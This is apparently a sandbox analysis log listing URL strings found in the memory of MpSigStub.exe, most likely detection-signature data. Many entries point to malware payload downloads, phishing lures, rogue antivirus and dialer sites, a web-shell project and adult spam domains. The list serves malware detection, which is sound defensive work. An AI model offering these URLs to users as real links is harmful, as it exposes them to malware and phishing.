Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://cbadenoche.com
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://cbl.toolbar4free.com/cgi-bin/s.exe
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://cc.advancedpccare.com/wcfCountryPricing/countrypricing.svc/GetCountryCode
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://ccdelsur.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18325799879.00000138BCB89000.00000004.00000001.sdmp	String found in binary or memory: http://ccfairy.com/
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://cdeinaa.com/sm.php
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://cdeinaa.com/sm.php?pizda1=%d
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.ap.bittorrent.com/control/tags/
Source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.chatcdn.net
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.che.moe/ymufnn.exe
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.gigaclicks.net/file.php?supp=126
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.gigaclicks.net/file.php?supp=130
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.montiera.com/mntr/cmn/addonmsg.htmx
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.starter.fm/s/tuto4pc/ads/fr/startertv/player_tv.html?
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://cdn.zry97.com/youxi/index_x
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://cdsa.xyz
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://ceaircelle76.org/2.php?configklvar=1
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://cekirdekinanc.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://celebrity-nude-fuck.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://celebritybeefcake.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://celebs21mangap.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://cert.beahh.com/cert.php
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://chambahistory.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://chemgioaz.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://chistepordia.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://chiuwes.com//kemu.exe
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://chnfsub2manglobalsndy2businessexytwo.duckdns.org/office/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://chu.pe/6xo
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://chutkiraani.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://chuyenquanaotreem.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://cicahroti.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://citw-vol2.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://ckpetchem.com
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://cl.1ck.me/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://clarityupstate.com/b.ocx
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://clean-pelican.cloudvent.net/dxdae.html)
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://clean.systemerrorfixer.com/MTg1MzE=/2/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://cleanwebsearch.com/?q=
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://client.aldtop.com
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://client.myadultexplorer.com/bundle_report.cgi?v=10&campaignID=%s&message=%s
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://clientportal.download/123.php
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://clientportal.download/div.php
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://cloud-search.linkury.com
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s
Source: MpSigStub.exe, 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp	String found in binary or memory: http://clubdelaparrilla.cl/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://cnr.org.br/ups-quantum-view
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://cns.3721.com/cns.dll?
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://cns.3721.com/cns.dll?xC
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://coastervilleregalos.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://cock4worship.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://coconut-pete.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://code.google.com/p/b374k-shell
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://coltaddict.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://community.derbiz.com/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://company.superweb.ws/view/note.exe
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://companyprivatedocumentservershub100000.braddocksrentals.com/commondocs/)
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://computerscience2.com/document-needed/
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://config.juezhao123.com/c.ashx?ver=&c=
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://connect.act-sat-bootcamp.com/dana/home.php
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://construtoramistral.com.br/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://contentedmerc.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://continuetosave.info/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://coolwalpaper.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://cooperjcw.xyz/bjsdke.exe
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://coppolarestaurant.com/cgi/resume2.php?id=
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://count.e-jok.cn/count.txt
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://count.key5188.com/vip/get.asp?mac=
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://countdutycall.info/1/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://countexchange.com/config/line.gif
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://countrtds.ru/tdstrf/index.php
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://cpanel.asimsrl.com/ifk/cat.php
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://cphepiwy.rebatesrule.net/8c40f5b1c5ba53fb.7tnlpjp5selle4?default
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://cpr-foundation.org/reportmaersknew.php
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://cprvstd4upcomingtalentanimationauditnyc.duckdns.org/receipt/invoice_112229.doc
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://cpvfeed.mediatraffic.com/feed.php?ac=%s&kw=%s&url=%s&ip=%s&rfo=xml
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://cr-installer-fallback.s3-us-west-2.amazonaws.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://craghoppers.icu/Order.jpg
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://crl.defence.gov.au/pki0
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp	String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://crxupdate.pw/Crxx/background.js
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://crxupdate.pw/Crxx/flash.xpi
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://cs-skiluj.sanfre.eu/vmjz848148/
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://cs.zhongsou.com/
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://csgo-run.xyz/dl.exe
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://csjksco.com/initial/)
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://csv.posadadesantiago.com/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://cts.hotbar.com/
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://cts.hotbar.com/trackedevent.aspx
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://cupid.556677889900.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://cvcviagens.sslblindado.com/documento.rtf
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://cvfanatic.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://cxdlk.esy.es/iej3d1/)
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://d.20apoaf.com/xuiow/
Source: MpSigStub.exe, 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	String found in binary or memory: http://d.ackng.com/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://d.gameplaylabs.com/ce9237be57719933386c8a88b67bf7a5/install.xml?pid=
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://d.robints.us/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://d.sogou.com/music.so?query=%s
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://d.xmapps.net/i.php
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://d1.downxia.net/products/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://d2.3dprotect.net:90/update/?id=%d
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://d2hrpnfyb3wv3k.cloudfront.net
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://dafshare-org.eu.paccar.com
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://dailypictur.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://dailytop10tracker.com/important-please-read/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://danielflors.com/question/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://darling4sil.5gbfree.com/companyprofile.zip
Source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp	String found in binary or memory: http://data.webwatcherdata.com/v51/ClientService.asmxx
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://data1.yoou8.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://dataoffice.zapto.org
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://dating2u.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingaction.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingbank.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingexplorer.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingfavorite.com
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingfavorite.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingfirst.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datinggallery.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datinggate.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingleader.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingmachine.net
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://datingvirtual.net
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://dec.ip3366.net/api/?key=20171119174239256&getnum=99999&proxytype=0
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://default.home
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://defaultincoming.mangospot.net/prf/reg.dot
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://delta-akb.ru/image/data/goods/dtm/.../log.php?f=404
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://demo.sabkura.com/overdue-payment/
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://designte.com/shop?abc=cgdpzd04jni9oc4y
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://det-colors.ru/invoice-number-09203/
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: http://detayworx.com/_vsnpNgyXp84Os8Xh.php
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://devee.emlnk.com/lt.php?s=b7abe8a8120881cc5c9dab6eac28ddbe&i=1a3a1a
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://device-update.ddns.net
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://device-update.ddns.net-oupdate.exe
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://df20.dot5hosting.com/~shitshir
Source: MpSigStub.exe, 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp	String found in binary or memory: http://dgdsgweewtew545435.tk
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://dialers.netcollex.net/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://dialin.bunm.de/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://dialin.comonline.net/
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://dialin.dnibv.com/
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://dialup.carpediem.fr/perl/countdialupinter.pl?x
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://dialup.carpediem.fr/perl/dialup.pl
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://dialxs.nl
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://dialxs.nl/install/
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://dialxs.nl/install/cf
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://dimas.stifar.ac.id/vjrzzufsu/
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://dintandnesin.ru/april/view.php?id=
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: http://directplugin.com/dialers/
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: http://directplugin.com/dialers/x
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://discoverberts.com.au/dav//assets/checkapp1.php
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://discovirtual.terra.com.br/vdmain.shtml
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://disk.karel
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://disk.karelia.pro/2adftYz/392.png
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://dist.checkin100.com/command?projectID=%s&affiliateID=%s&campaignID=%s&application=%s&v=9
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://diydaddy.us/cgi-bin/8f_i
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://dl.dropbox.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://dl.dropbox.com/u/
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_a
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://dl.gencloudex.com/spd/shopp/sense9.exe_ax
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://dl.pipi.cn/pipi_dae_
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://dl.static.iqiyi.com/hz/IQIYIsetup_senxing
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://dl.wizzuniquify.com/download/1/wizzuninstallmodule.exe
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exe
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://dld.baseflash.com/ProtectbaseflashSetup.exex
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://dld.baseflash.com/dotnetfx
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://dld.rewinup.com/dotnetfx
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://dmww.dmcast.com/script/update.asp?version=%s
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://dmzeventsbali.com/images/usps/usps/label.htm
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://dns.cyberium.cc/script/
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://do.crionn.com/ola.php
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://docs.atu.ngr.mybluehost.me/
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://docs.atu.ngr.mybluehost.me/presentation.dllregsvr32
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://docs.herobo.com
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://doctor-antivirus.com/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://doctor-antivirus.com/presalepage/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://doctorantivirus2008a.com/support.php
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://dofned.tk/player.php?sid=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://dokument-9827323724423823.ru/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://dolfy.sedonahyperbarics.com:8080/keyboard_shortcut.js
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://domainserver.co.kr
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://down.emoney.cn/wl
